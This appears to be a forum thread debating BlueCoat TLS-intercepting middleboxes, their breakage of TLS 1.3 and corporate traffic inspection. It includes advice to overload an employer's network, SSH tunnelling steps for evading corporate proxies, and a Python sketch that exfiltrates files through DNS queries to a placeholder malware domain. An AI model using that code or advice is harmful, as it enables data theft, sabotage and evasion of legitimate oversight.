Note that this happens even when using a BlueCoat proxy in non-MITM mode. BlueCoat tries to "analyze" TLS connections, and rejects anything it doesn't understand. This exact issue occurred with TLS 1.2 back when BlueCoat only understood 1.1/1.0.
In this case, it doesn't sound like they're reverting it because of overall breakage, but rather because it breaks the tool that would otherwise be used to control TLS 1.3 trials and other configuration. Firefox had a similar issue, where they temporarily used more conservative settings for their updater than for the browser itself, to ensure that people could always obtain updates that might improve the situation.
Good grief! From David Benjamin's final comment:
Note these issues are always bugs in the middlebox products. TLS version negotiation is backwards compatible, so a correctly-implemented TLS-terminating proxy should not require changes to work in a TLS-1.3-capable ecosystem. It can simply speak TLS 1.2 at both client <-> proxy and proxy <-> server TLS connections. That these products broke is an indication of defects in their TLS implementations.
It's understandable that I've never heard of BlueCoat: clearly this product's success is based more on selling to executives than on quality, and it has been some time since I worked in an organization that had executives to sell to.
How do you fix this when you're naught but a humble employee? Well, a friend of mine worked at a fairly large tech company where a salesguy for these boxes had convinced the CTO they had to have them. Every tech-person "on the floor" hated the idea, so before the boxes were installed they conspired on their free time to write some scripts that ran lots of legitimate HTTPS traffic, effectively DDOSing the boxes and bringing the company's internet to a crawl for the day, like Google would take ten seconds to open. Then obviously everyone (including the non-tech people) started calling the IT helpdesk complaining that the internet was broken. MITM box salesguy then had to come up with a revised solution, costing 20x more than his first offer, and that was the end of that.
If you already are suffering under MITM boxes, a similar strategy with a slow ramp-up in traffic might work.
Yeah. This is a fireable offense. The solution to your company MITMing your traffic is to not use your work computer for anything personal that matters. It's not like we have a shortage of devices to connect to the internet.
If you live in a third-world country (or the US) which lacks basic functions of society like employee protection, a sensible minimum wage, universal healthcare, paid parental leave, etc., then yes, I don't recommend doing what my friend did and employing a little "civil disobedience" in such cases.
TBH, for most techies I don't think opposition to MITM boxes comes down to "I don't want them to catch me looking at cat photos" but more along the lines of "this will actually reduce security as much as it improves it, and the companies providing these products are also aiding repressive regimes and human rights violations across the globe". Personally, I would find it unethical for the company I work for to buy these products.
I agree talking to IT is step 1, and I'm assuming that hasn't worked.
Collective action (strikes, "work slowly protests" etc.) as a protest against company policy has a long precedent of a) being protected by law and b) being much more effective than a single employee quitting, while simultaneously reducing the downside for employees (in L_\infty norm).
Edit: the old Keynes quote comes to mind: "if you owe the bank $100 you have a problem, but if you owe the bank $100 million the bank has a problem" -- if 1 of the company's devs commits a "fireable offense", he/she has a problem, but if 100 of them do, the company has a problem.
However, with collective action the company is usually aware of its employees' actions; here, if I'm reading correctly, management was not notified that this was happening, so it's perhaps not quite the same thing.
When I mentioned on a mailing list that we should probably pronounce this like "expect your personal bank info to be pwned" rather than "please don't use work resources for personal purposes", I was reminded that there are lots of perfectly reasonable work-related purposes that are undermined by TLS MitM. Corporate bank accounts, ACH transactions, payroll, vendor accounts, tax portals, employee benefits/401k, etc. All of that stuff should actually be secure.
Incidentally, "Blue Coat ProxySG 6642" was the only middlebox to get an "A" from the study referenced above. Apparently they didn't test for 1.3...
Absolutely, but then the right approach is to let the IT dept know that they are running the company into the ground. Often, the IT department or management may be insensitive to that argument (and then you get a Sony Entertainment hack, but then it is well deserved) or they may follow regulations that are beyond their control. But it is a management decision.
How are any of the things you listed undermined by corporate MitM?
Everything you listed is information that the company already has access to. Why isn't it sufficient for there to be access controls by policy, the same way the company protects other sensitive information from unauthorized access within the company?
Keep up man! Upthread [0], reference was made to a study that's recently made the rounds detailing the basic insecurity of MitM devices. The problem isn't only that corporate network admins see everything, it's also that after the device downgrades TLS (or worse) attackers can also see what they want...
My day job includes working on FreeBSD systems and also doing open source FreeBSD work (push upstream, pull down to us). There are sometimes embargoed security notices in my email. There is no chance I will permit my employer to MITM my SSL and risk some clowns in corporate IT obtaining these mails. (The highest-security ones are GPG encrypted, but others are not.)
I need my personal email to do my work. It needs to stay secure from even my own employer. Period.
Kinda amazed you got downvoted for pointing out that the parent is essentially advocating for intentionally trying to take down your employer's network because you dislike their IT policy.
This isn't just a fireable offense. Especially given the tendency for computer-related criminal laws to be overly vague, it's entirely possible you could be charged with a crime if you are intentionally trying to DoS your employer's network.
Same thing I did when I noticed our BlueCoat started MITMing my bank connection - a ticket to IT to enable a bypass for the specific domain. They refused to do it for google/gmail, but banking sites started working normally the next day. Youtube, facebook and other non-work-related stuff is just blocked, unless you need them to do your job (like the PR dept).
Bluecoat is extremely widely used in some fields. They were in the news a while back when it was discovered that Syria (before the civil war) was censoring their internet access using Bluecoat devices (allegedly unauthorized by Bluecoat)[1]
They have many customers in the Fortune 500 who use these boxes to make sure workers only visit the web sites they should, and so that IT gets to know when they misbehave.
The entire use case of BlueCoat and the like is to satisfy executives' desire to spy on all usage of their network. It's certainly not to benefit the users who are stuck behind it, to increase their security, or to give them a better Internet experience.
Fuck the users. If users had their way, they'd have all the local administrator privileges they wanted so that they could download malware to their heart's content. From a non-IT perspective, they would also be free to download porn, potentially child porn, which is a crime to merely possess, and exfiltrate terabytes of company secrets.
Which holds trusted secret keys and which, in its normal unremarkable operation, intercepts, parses, reconstructs, decrypts, re-encrypts, forwards, and optionally logs both confidential and attacker-controlled traffic? And is also known to be used for nationwide bulk internet censorship by regimes often called 'oppressive'?
Why, doesn't it just.
Please consider, very carefully, the ethics and equities issues one might face with any interesting findings here.
What's true is true - better to know it than stick our heads in the sand. If these boxes have vulnerabilities (who am I kidding, they do parsing, they're probably implemented in C "for performance", of course they have vulnerabilities), we are better off for knowing about them than not.
This is precisely the conclusion Google reached and has used as they work on QUIC.
Even protocol state (equivalents of TCP FIN/SYN/etc) is encrypted, to ensure that middleboxes don't get ideas about what the protocol is 'supposed' to do - ideas which make it hard to change the protocol in the future.
Actually, no, that would just make everything more difficult. Browsers need to start coming to terms with the fact that they do not get to dictate how www networking operates for every organization around the world.
There are hundreds of thousands of organizations that need inspection and caching and proxying of internal www traffic. Insisting that all protocols disallow or frustrate this disregards the real needs of users and organizations.
Further still, if a protocol can't be designed to be implemented easily, or to tolerate implementation bugs or missing features, it's a crap protocol or application. Middleware will always be necessary, and encryption really shouldn't change the requirements of how middleware needs to work with a protocol.
I disagree. We were living in the period of easy middleware (this was before the HTTPS rollout), and it generally sucked -- there were supercookies, ad injection, and general app breakage when you got a captive portal page instead of the expected RPC response.
The middleware should require effort to install, and it should be obvious when it is active. Otherwise, companies which have no business MITM'ing the traffic -- such as ISPs and free wifi providers -- will start to do it just because it's so simple.
For example, Google may require an MDM app on Android devices used to access corporate data. This app ensures that the device has the right policy (screen lock, encryption), and I think it may also check for malware apps. This is how it should be -- if you need corporate control over devices, install a special application on them; it will be more efficient and it will do more.
And that's why the browser is at fault - they could have designed it to be more permissive or more secure, depending on the role. They decided instead on a one-size approach, once too permissive, now too restrictive.
As a regular user, I can't just use a captive portal to get free wifi, because any site I go to has HTTPS, so they all break, and I can't accept the goddamn HTTP acceptance page unless I can conjure up a valid domain with no HTTPS like I'm Svengali. Now all the OSes have special checks to see if there's a captive portal, because the browsers couldn't be troubled to build a function for it, even though it would improve their security and usability at the same time.
Captive portals are not the enemy. Shitty UX and a bad attitude toward the needs of real users is. Locking browsers/protocols down more is just doubling down on this mentality.
Yes, captive portals are the enemy. They break an important assumption: requests either succeed and return correct data, or fail and return an error.
Were you writing a forum post? It was lost because it got submitted to the captive portal. Were you in a dynamic app? It crashed because it got HTML instead of JSON. Does your page reload ads in iframes? Your page position, and the page itself, are now lost, and you are on the captive portal page. Did you have a native app which did HTTP requests and cached them? Congrats, you now have invalid data in your cache.
And I have seen captive portals which were broken. How about getting redirected to the login page every time you go to your favorite website, because the redirect page got cached somehow?
Good riddance. Yes, the browsers should include better captive portal support like Android does, possibly triggered by SSL certificate mismatch errors, but even the current situation, where I have to type "aaa.com" by hand all the time, is great.
Captive portal authentication functionality has no business being part of a browser anyway. Why should I have to start a browser to make my non-browser client application connect to my non-HTTP server? A captive portal is a special case of rich network-level authentication, which belongs in the operating system. Also, 802.11u is specifically designed to help create uniformity in this area.
Then those organizations are free to not use encryption-friendly protocols for internal resources. Furthermore, those companies are free to fork Chromium or Firefox and distribute their own browser that renders these protocols toothless.
IOW, it's completely fair to argue that users might not have a universal right to encryption, but it's just as legitimate to argue that browser vendors have no obligation to enable the trivial circumvention of encryption. If the software doesn't work for your needs, then stop using the software.
No they aren't, encryption is still required for internal transactions as well as working with external partners. And fork a browser? Are you nuts?
Nobody made that argument. But browser makers have an obligation to keep the world wide web usable. If it's not usable, say goodbye to dot-com companies selling services to businesses, which, aside from advertising revenue (and the hopes and dreams of venture capitalists), is the only way they survive.
The only reasonable alternative if you start locking out legitimate business use cases of traffic inspection is to abandon the web and start making proprietary native applications and protocols like back in the old days. This is bad for users and bad for business.
It's not like it's even hard to support these use cases while maintaining user security! Browsers just totally suck at interfacing with a dynamic user role. Better UX and a more flexible protocol would solve this, but nobody wants to make browsers easier to use (more the opposite)
> No they aren't, encryption is still required for internal transactions as well as working with external partners.
Then continue to use the encryption that exists today. After all, your concern is for future standards that make encryption stronger.
> And fork a browser? Are you nuts?
A lone user forking a browser would be nuts. A company that's already willing to pay through the nose for MITM proxies can afford to fund a minor browser fork. Indeed, if this use case is as important as you suspect, then you ought to start a company that sells customized browsers for exactly this purpose. Think about what site you're on; where's your entrepreneurial spirit? :)
> But browser makers have an obligation to keep the world wide web usable.
Usable for whom? Between users (who need strong encryption), websites (who need strong encryption), and corporate intranets (who need to snoop), whose needs ought to be prioritized?
> abandon the web and start making proprietary native applications
The web emerged from a world where all applications were native and proprietary; I don't think any browser vendor is losing sleep over this possibility.
> Browsers just totally suck at interfacing with a dynamic user role.
Again, sounds like there's demand for a new browser then. :)
> nobody wants to make browsers easier to use (more the opposite)
There is no such thing as a minor browser fork. And my whole point was not to pick a side; it was to make the browser more flexible so it worked for more cases, not fewer.
Every non-Microsoft browser vendor used to cry themselves to sleep at night from days fighting against vendor lock-ins and corruption of standards. They certainly care if it all goes south.
I suppose people don't want easier browsers because they imagine they are easy enough and can't imagine something better. At least I hope that's the reason, and not that they fear change, or are indifferent to the needs of people other than themselves and prefer to design for that alone.
There's no way in hell I'm crazy enough to make a browser, though. I'd rather run for elected office, or eat an entire Volkswagen Golf.
BlueCoat makes me cry. We have an application running inside the firewall of one of our clients that communicates with an HTTPS REST API hosted by a server in our datacenter. The connection must be encrypted because it handles confidential information, but when it passes through BlueCoat's TLS proxy, the Authorization header gets mangled and the app can't authenticate against our backend. Higher-ups decided that it would be better to try to convince the client to let our app bypass their proxy than to implement a custom workaround for BlueCoat users, but the client never let us through, so the only solution we could implement involved manually SCPing the required data between client and server.
SSH is almost always available to connect through the firewall. Do IT people understand how easily you can work around a proxy using ssh? Just start a VM in the cloud (like a C1 at Scaleway for 3.6€ per month) and install squid (with default options). On your PC, run portable applications: PuTTY connected to your VM with a forward of the proxy port, and portable Firefox configured to use your forwarded proxy.
There's not even a need for installing a proxy! SSH has native SOCKS proxy support, so all you need to do is set up an SSH connection and set the browser connection to a dynamic SSH port forward.
This also prevents leaking DNS requests: with a standard proxy, your computer might be trying to look up domains using the company DNS system. With a SOCKS proxy, you can forward all DNS traffic as well!
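To make the DNS point concrete, here is a minimal Python sketch, assuming a dynamic forward is already running (e.g. started with "ssh -D 1080 user@your-vm") and that you've installed the SOCKS extra via "pip install requests[socks]"; the host, port, and URL are made up for illustration:

    # Sketch only: assumes "ssh -D 1080 user@your-vm" is already running.
    import requests

    proxies = {
        # The socks5h scheme (note the "h") resolves hostnames on the proxy
        # side, so DNS lookups are tunneled too instead of hitting the
        # corporate resolver.
        "http": "socks5h://127.0.0.1:1080",
        "https": "socks5h://127.0.0.1:1080",
    }

    print(requests.get("https://example.com", proxies=proxies).status_code)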
The problem is middleboxes like Fortigate also do MITM on ssh connections. Assuming you are not bringing home devices into work and don't have your ssh server's fingerprint memorized, you might be tempted to just type 'yes' when prompted.
In any case you are left with either no SSH, or somebody watching your SSH who has control over your ability to tunnel.
The best you can do with these boxes is make a sub-tunnel over one of the protocols that they do allow through; you just can't rely on the primary encryption provided by the protocol that the middlebox is MITMing. If somebody actually looks at the traffic, they will see that you are not transferring plain text at the middlebox, so that might raise some eyebrows.
From what I've read (http://www.gremwell.com/ssh-mitm-public-key-authentication), if you use public key authentication with SSH, the MITM will break the authentication (forcing ssh to ask for a password). It's the same as with TLS client certificate authentication: in the same way the server certificate authenticates the server to your browser, the client certificate authenticates your browser to the server, and the server will reject MITM connections as unauthenticated.
While for TLS, unfortunately, client certificates are not a solution against MITM due to their awful user experience and privacy concerns, for SSH public key authentication has a good user experience and is very common.
In my experience many companies simply filter based on port number. Run your external sshd/openvpn on port 80 and you're good to go. But of course that's going off topic since TFA is obviously about middleboxes actually intercepting and analyzing the traffic.
In truth though, if you start considering your employees like the enemy, it's just a never-ending uphill battle, especially if your employees are comp-sci folks. You could tunnel SSH over HTTP or even DNS if you cared enough.
You want your employees to collaborate with you in avoiding and tracking down malware and potential leaks. If everybody is used to working around your restrictions, you just make it harder for yourself to figure out what's happening when something goes wrong.
For instance if your policies are too restrictive people will use their smartphones more and more to access the internet. Then some will start doing work stuff on their smartphones and you lose all control. What do you do then? Forbid smartphones within the company? Fire everybody you catch using one? It's just an arms race at this point.
Sane security measures and some pedagogy go a long way. Easier said than done though, it's a tough compromise to make.
Ask what problem they're trying to solve: is it really because the IT people want to monitor everyone's web surfing, or do they have something like an audit requirement? There are a LOT of people in the latter camp who need to check the box to say they comply with some policy, regulation, etc.
Similarly, good security people know that port filtering is a losing game unless you are willing to restrict everything to a known-safe whitelist – the malware authors do work full-time on tunneling techniques, after all – and may be focusing their efforts on endpoint protection or better isolation between users/groups.
Rejecting anything it doesn't understand sounds like a bug to me. If it sees that it's TLS, it should attempt a protocol downgrade. There's absolutely no reason for this to break, as TLS 1.3 exists alongside TLS 1.2 (For now).
The surprising part (or maybe not) is that BlueCoat had been made aware of this change months ago and never got around to properly testing it. This is one of the software's main purposes, and the fact that they didn't even make sure it works with the newest Chrome, leading to such a mess, is pretty sad.
The way this is going to be spun, I promise you, is: Google released a new version of Chrome, and support for that upgrade is in BlueCoat v.next. Here's an invoice for the new license + consulting services for the upgrade.
In corporate environments, the last thing that changes is the thing that gets blamed. BlueCoat was not upgraded, Chrome was, and now things are broken? Not their fault.
> Rejecting anything it doesn't understand sounds like a bug to me.
It sounds like a perfectly reasonable behaviour if the goal is to "fail closed", to provide more security in a fashion similar to a whitelist.
> If it sees that it's TLS, it should attempt a protocol downgrade.
I don't remember the exact details but I recall reading that TLS has a mechanism to prevent version downgrades, precisely to defend against such "attacks", so the connection would not succeed in that case either.
The TLS negotiation is mutual. Both endpoints tell each other what they support and they agree on a protocol that's mutually supported.
If merely advertising 1.3 while still advertising older versions causes blue coat to break, it has a bug in TLS version negotiation.
There is no downgrade or whitelist or failing closed. Each end says what it supports, and BlueCoat blows up the connection if it sees that the other end supports a newer version. It should say "oh, we both support 1.2, let's use that." And apparently it's done this before, so there's even less of an excuse for it.
This is apparently a problem when BlueCoat is used in non-MITM mode. That probably means BlueCoat is merely inspecting the initial handshake, not modifying it, which would imply it can't actually modify the handshake.
It then simply inspects a connection it doesn't understand and 'fails closed' by preventing that connection.
Client and server exchange a list of capabilities at the beginning of a TLS connection; if the proxy just filters out the protocols/versions it doesn't understand, server and client will agree on a different version (like 1.2).
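To illustrate the principle (not real ClientHello parsing - just a toy model using (major, minor) version pairs, where (3, 3) is TLS 1.2 and (3, 4) is TLS 1.3):

    # Toy model of pre-1.3 TLS version negotiation: the server picks the
    # highest version it supports that is at most the client's offered max.
    def negotiate(client_max, server_supported):
        candidates = [v for v in server_supported if v <= client_max]
        if not candidates:
            raise ValueError("no mutually supported version")
        return max(candidates)

    # A 1.2-only implementation seeing a 1.3-capable client should simply
    # pick 1.2, not blow up the connection:
    assert negotiate((3, 4), {(3, 1), (3, 2), (3, 3)}) == (3, 3)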
I've written a similar rebuttal to your sibling's comment here[1].
This isn't "failing closed", and this isn't a whitelist. TLS allows you to whitelist to certain versions of the protocol during the initial negotiation at the start of the protocol; that is the opportunity for either end to state what version of the protocol they'd like. It is not permissible in the protocol to close the connection as Blue Coat is doing.
This isn't a downgrade attack, either: both server and client are free to choose their protocol version at the beginning. The client & server will later verify that the actual protocol in use is the one they intended; this is what prevents downgrades.
It's in BlueCoat's political interests to make sure TLS 1.3 rolls out as slowly as possible since it actively works against their entire business model, so they have zero incentive to be proactive about this until the TLS 1.3 extensions are approved that make MITM possible again.
Sorry, no. TLS is explicitly designed to allow smooth upgrading like this. This proxy is supposed to (in response to a client hello w/ TLSv1.3) respond with TLSv1.2 if that's what it supports. This is still a rigorous parsing of the input being given: nothing is "not understood": version negotiation is an inherent part of the protocol and is supposed to allow for painless upgrades to more secure protocols.
The RFC (which if you're implementing TLS, you should have open at all times) explicitly calls out exactly this behavior:
> Note: some server implementations are known to implement version negotiation incorrectly. For example, there are buggy TLS 1.0 servers that simply close the connection when the client offers a version newer than TLS 1.0.
The quality of this vendor's implementation is extremely suspect.
It's a security feature, often malware will send encrypted traffic over 443 in an attempt to bypass firewalls. If BlueCoat can't understand the traffic, it drops it as it assumes it's malicious.
But the traffic is totally understandable -- the right action does not require knowing what TLS 1.3 is.
The way it is supposed to work is as follows: there is a protocol negotiation when the connection is established (which is obviously unencrypted), which contains the TLS versions supported. If a MITM proxy does not understand a version, it can just change those bytes to force the hosts to negotiate at a lower version.
So the only reason BlueCoat fails is that the authors failed to implement a forced version downgrade.
The Bluecoat sales people did a number on you huh? Sounds really good until you ask 'why doesn't Bluecoat understand this traffic' - because it really should.
This is a failure to implement any version of TLS correctly, not just v1.3. (TLS has support for version negotiation including receiving a hello from a client with a future version, such as v1.3.)
The fix should not have been reversion. The fix should have been a simple workaround: if the connection fails outright and no downgrade handshake was attempted, make a new connection starting at 1.2, which would succeed and the connection would open. This would be equivalent to a downgrade handshake from 1.3 to 1.2, but without requiring that all products support 1.3.
The problem with this fix is that then as long as you have the fallback, the user gains none of the security properties of TLS 1.3 (since the attacker can always force a downgrade by sending junk to the client during the handshake) and has the additional cost of a second TLS negotiation.
While Chrome previously implemented this "TLS fallback" to work around buggy endpoints*, those endpoints were a much larger issue and difficult to fix, whereas these middlebox issues affect a much smaller portion of users, and we're hopeful that the middlebox vendors with issues can fix their software in a more timely manner.
* TLS 1.3 moves the version negotiation into an extension, which means that old buggy servers will only ever know about TLS 1.2 and below for negotiation purposes and won't break in a new manner with TLS 1.3.
Am I not correct that 1.3 got backed out of chrome for the current issue? So 1.3 isn't even there now... Which breaks anything that explicitly requires 1.3. My fix would support all cases and not break anything. Unless I missed something?
Nothing can require 1.3, since 1.3 isn't finished yet. They were doing interoperability testing with a draft version of TLS 1.3, and nobody should require a draft version of TLS 1.3 without having a fallback to TLS 1.2.
Sometimes it is even worse than that. Some of the middleware TLS proxies don't verify the certificate before they resign the data. They completely open up your enterprise to MITM attacks, and in fact hide the fact that you are being MITMed. This came to light way back during the Superfish debacle, and some vendors still have not fixed the problem.
Amazing how this was predicted coming up on a year ago*
> At this point it's worth recalling the Law of the Internet: blame attaches to the last thing that changed.
> There's a lesson in all this: have one joint and keep it well oiled.
> When we try to add a fourth (TLS 1.3) in the next year, we'll have to add back the workaround, no doubt. In summary, this extensibility mechanism hasn't worked well because it's rarely used and that lets bugs thrive.
This is even crazier than people may think at first look.
The TLS community knew that there would be problems with the deployment of TLS 1.3 with version intolerance, because there always have been. That's why the version negotiation was changed and a mechanism called GREASE was invented to avoid just such problems. But it seems BlueCoat has shown us that there's no way to anticipate all the breakage introduced by stupid vendors.
The takeaway message is this: Avoid Bluecoat products at all costs. These companies are harming the Internet and its progress.
TLS 1.3 may be a working draft; correctly implementing TLS version negotiation, on the other hand, is not, as it is already a requirement of previous versions.
Sure, it's a working draft, but companies are actively working to develop and test their server side integrations. Having to disable it like this harms those efforts as fewer users are making connections (by default).
While there was a secondary issue with the deployment regarding unofficial builds/derivatives, the field trial was primarily rolled back due to the number of customers affected by the middlebox issues in their enterprise/edu networks.
I'm sure the students of the Montgomery County, Maryland public school system, who are affected by this problem, will take your advice into consideration when submitting resumes to other public schools.
The Board doesn't have a choice, under CIPA[0], content filtering is a requirement for the FCC's E-Rate program[1] in which the government pays some of the cost of the school's internet connection.
Most (private) schools in my area do not interpret it to require MITM. We specifically want to avoid MITM because it's a can of worms we don't want opened. We rely instead on SNI-based filtering systems, which work well for the most part. I'm using TLS 1.3 in Firefox Nightly with no issues.
>> content filtering is a requirement for the FCC's E-Rate program in which the government pays some of the cost of the school's internet connection.
I'd be interested to see the cost of compliance versus the subsidy. The federal government puts an awful lot of strings on financing for schools given the relatively low percentage of overall funding they pay.
I'd like to see some state somewhere turn down the money and see what they can do with the extra flexibility.
IIRC the E-Rate program is a high-double-digit percentage subsidy, such that wireless ISPs will lose business by not having an E-Rate certification, because the school will just stick with poky 6 Mbps DSL for the 200+ kids at a rural school.
Of course they have a choice. It's not very principled to sell your children's online privacy in exchange for some "grant" money going to an oppressive-dictatorship-supporting company like BlueCoat.
(Also, it's possible to do server-address-based blocking without MITM.)
Could they try to find an alternative source of funds (as the San Francisco Public Library did), or adopt an interpretation of CIPA under which they don't have to use this particular feature?
Think about how that conversation would go. They're driven by concerns that kids will look at porn – and remember that if they don't try to stop that, the local Fox News affiliate will be running a loop 24x7 saying they're trying to force godly children to watch it – or that someone will breach a staff member's computer and steal PII, compromise the security cameras, etc.
Against that, "you're making life hard for Chrome engineers' aggressive upgrade campaign" is a pretty hard sell. "Buy a better box," perhaps, but I don't see a viable argument for "don't monitor".
Without an SSL MITM, Intrusion Detection Systems (IDS's) are much less effective.
If you're using your company's network, then they have every right to monitor all of the activity on it. They're trying to protect trade secrets, future plans, customer data, employee records, etc. from attackers who would use that information to do harm to the company, its customers, and its employees. If you don't want your employer to know what you're doing, then don't use the company computer or company network to do it. And while you may think that you're too tech savvy to fall prey to malware 1) not everyone at your company is, and 2) no amount of savvy will protect you from all malware, especially ones that gain a foothold through an unpatched exploit. And there's also that whole other can of worms: malicious employees.
I think this SSL MITM thing has gone way too far. When an exec asks an engineer if it's possible to monitor all internet communication that goes in and out of the company network, including communication that is encrypted by TLS, the correct answer is no. In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it. The exec will only get the answer they want if they pressure the engineer, or if the engineer is trying to sell them something (like a MITM proxy.) Then the engineer will admit that it's possible to snoop on some TLS connections if you do awful things like installing fake certificates on company laptops. They may or may not mention that if they do it wrong it will degrade the security of everything on the network. God forbid the computers at a bank should be less secure than the computers in the average household because a MITM proxy is silently downgrading the security of all the TLS connections that travel through it.
Now, because engineers are so bad at saying 'no' to the people who want SSL MITM, it's apparently become a regulatory requirement. SSL MITM might let you passively surveil your employees' Facebook Messenger conversations, but it still doesn't protect you against a malicious employee who is tech-savvy (or malware written by people who have SSL MITM proxies in mind.) They could just put the information they want to smuggle out of the network into an encrypted .zip. They could even do something creative like using steganography to hide it in family photos that they upload to Facebook. The only real solution to this is to lock down the devices that people access the network on, not the network itself.
>In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it.
This isn't true. The TLS protocol is not a philosophy; it does not have an opinion on who you should trust as a root certificate authority. If you trust a particular root, it is wholly within the design of TLS to allow connections that are monitored by whoever controls that root authority. Who is trusted is up to you.
>They may or may not mention that if they do it wrong it will degrade the security of everything on the network.
Right, that's why you don't do it wrong. This same argument applies for any monitoring technology, like cameras. An insecure camera system actually helps a would-be intruder by giving them valuable information. So if you install cameras, you'd better do it right.
As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all? There is no security panacea, just a wide range of imperfect measures to be deployed based on your threat model and resources. And luckily, most bad guys are pretty incompetent. But to address some examples you give, and show how not all is lost:
- A large encrypted zip file is sent out of the network. Depending on what your concerns are, that could be a red flag and warrant further analysis of that machine's/user's activity.
- Software trying to circumvent your firewall/IDS is definitely a red flag. You might even block such detected attempts by default, and just maintain a whitelist for traffic that should be allowed regardless (e.g. for approved apps that use pinned certificates for updates).
> > In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it.
> This isn't true. The TLS protocol is not a philosophy; [...]
Well, the TLS specification [1] says, as the first sentence of the introduction: "The primary goal of the TLS protocol is to provide privacy and data integrity between two communicating applications." I think, if something is the primary goal of the TLS protocol, it can be said that TLS is designed to do it.
> This isn't true. The TLS protocol is not a philosophy; it does not have an opinion on who you should trust as a root certificate authority. If you trust a particular root, it is wholly within the design of TLS to allow connections that are monitored by whoever controls that root authority. Who is trusted is up to you.
Like the sibling comment said, this goes against the wording of the TLS specification, but I also think this is looking at the issue from the wrong perspective: from the perspective of the network admin rather than the user. The user does not trust the MITM proxy's fake root. Let's say you set up a corporate network and rather than just whitelisting the external IPs you trust, you give your users the freedom to browse the internet but you pipe everything through a BlueCoat proxy. Your users will take advantage of this freedom to do things like, say, checking their bank balance. When the user connects to the banking website, they will initialize a TLS session, the purpose of which is to keep their communication with their bank confidential. The user will assume their communication is confidential because of the green padlock in their address bar and the bank will assume their communication is confidential because it is happening over TLS. TLS MITM violates these assumptions. If the bank knew that a third party could see the plaintext of the communication, they probably would not allow the connection. If I ran a high-security website, I'd probably look for clues like the X-BlueCoat-Via HTTP header and just drop the connection if I found any.
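For what it's worth, that check is only a few lines of middleware. A toy WSGI sketch in Python (the header name is real; the blanket-403 policy is obviously a judgment call):

    # Toy WSGI middleware: refuse requests that arrived via a Blue Coat
    # proxy, which announces itself with an X-BlueCoat-Via header
    # (visible in the WSGI environ as HTTP_X_BLUECOAT_VIA).
    def reject_intercepted(app):
        def wrapped(environ, start_response):
            if "HTTP_X_BLUECOAT_VIA" in environ:
                start_response("403 Forbidden",
                               [("Content-Type", "text/plain")])
                return [b"Intercepted connections are not accepted.\n"]
            return app(environ, start_response)
        return wrapped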
> As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all?
In some cases, yeah. There are a lot of security measures out there that are just implemented to tick some boxes and don't provide much practical value. If they don't provide much value, but they actively interfere with real security measures (for example, by delaying the rollout of TLS 1.3), or they're just another point of failure and additional attack surface (bad proxies can leak confidential data, cf. Cloudflare), they should be removed. I'll admit most bad guys are incompetent, but it's dangerous to assume they all are, because that gives the competent ones a lot of power, and someone who is competent enough to know that a network uses a TLS MITM proxy will just add another layer of encryption. (Or, like some other comments are suggesting, they'll just test your physical security instead and try to take the data out on a flash drive.)
> still doesn't protect you against (...) malware written by people who have SSL MITM proxies in mind
Exactly this is what I don't get. Since these abominations are becoming ubiquitous, surely malware writers are starting to work on workarounds? And in this case, it's as easy as setting up an SSH tunnel and running your malware traffic through that, which is a few days of work at most for a massive ROI.
Not even malware writers: on the recent Cloudflare incident, there was one password manager which was affected, but the leak was harmless for them because the content within their TLS connections had another layer of encryption. Both MITM proxies and their TLS-terminating CDN can see only encrypted data.
In which case your malware can do DNS lookups against a suitable domain: just chop your file into suitably sized chunks, encode them as valid hostnames, and look up [chunk of file].evilmalwaredomain.com; soon enough the server handling evilmalwaredomain.com will have the whole file.
Or plain HTTP POSTs with encrypted content. If the box rejects stuff that looks encrypted, use plain HTTP POSTs that encode the binary by taking a suitably sized dictionary of words and rendering the data as nonsensical rants posted to a suitable user-created sub-reddit.
Or e-mails made using the same mechanism.
If you want low-latency two-way communication, doing this can be a bit hard, but you basically have no way of stopping even a generic method of passing data out this way unless you whitelist only a tiny set of trusted sites and reject all other network traffic (such as DNS lookups). And keep in mind you can't just lock down client traffic out of the network - you would also need to lock down your servers and filter things like DNS - the DNS approach mentioned above will work even through intermediary recursive resolvers (malware-infected desktop => trusted corporate recursive resolver => internet), unless they filter out requests for domains they don't trust.
But basically, if you allow data out, it's almost trivial to find ways to pass data out unless the channel is extremely locked down.
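To show how little effort the DNS trick takes, here is a hedged Python sketch of the sending side (the domain is hypothetical, and the chunk size and encoding are arbitrary choices):

    # Sketch of the "[chunk of file].evilmalwaredomain.com" idea from above.
    # base32 keeps every label DNS-safe; each lookup lands in the query log
    # of whoever runs the domain's nameserver.
    import base64
    import socket

    DOMAIN = "evilmalwaredomain.com"  # hypothetical attacker-run zone
    CHUNK = 30  # stays under the 63-byte DNS label limit

    def exfiltrate(data):
        encoded = base64.b32encode(data).decode().rstrip("=").lower()
        for seq, i in enumerate(range(0, len(encoded), CHUNK)):
            name = "%d.%s.%s" % (seq, encoded[i:i + CHUNK], DOMAIN)
            try:
                socket.gethostbyname(name)  # the answer doesn't matter
            except socket.gaierror:
                pass  # NXDOMAIN is fine; the query was still logged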
Totally agreed they have the right to monitor your network traffic, but I still think in most cases employees should try to push back on this.
At least from my view, it's not so much that I don't want my company to know what I'm doing, as that I don't trust their software to securely MITM all of my traffic. This thread doesn't fill me with confidence about the competency of these corporate MITM proxies. And the recent Cloudflare news doesn't help either -- they're effectively the world's largest MITM proxy, and even they couldn't avoid leaking a huge amount of "secure" traffic.
There are surely sectors where it's necessary for a company to MITM all traffic, but I think most companies will do better security-wise by not messing with TLS. It's just too hard to get right.
At my workplace, where we have to do TLS inspection for regulatory purposes, we provide an internet-only wifi network for employee personal use where we don't intercept TLS. This network is fully isolated from the corporate network, and corporate devices join a different, more monitored network. I believe this strikes the best balance between regulatory compliance and employee privacy. People can still use personal email or do online banking while at the office without inspection, but no corporate data can be moved en masse off company servers.
When connecting a corporate device to any non-corporate network (including the employee wifi) you can't go anywhere until the vpn is connected. The vpn routes you through all the same inspection points as being on premise.
And how can your inspection points verify that data isn't being exfiltrated? Arbitrary pipes can be made over SSH, over DNS, and I don't really consider these advanced. How do you handle techniques like chaffing and winnowing, steganography, or someone who knows how to transmit an arbitrary number of bits using only two bits?
DNS is my favourite hack in that respect because so few people are aware of it.
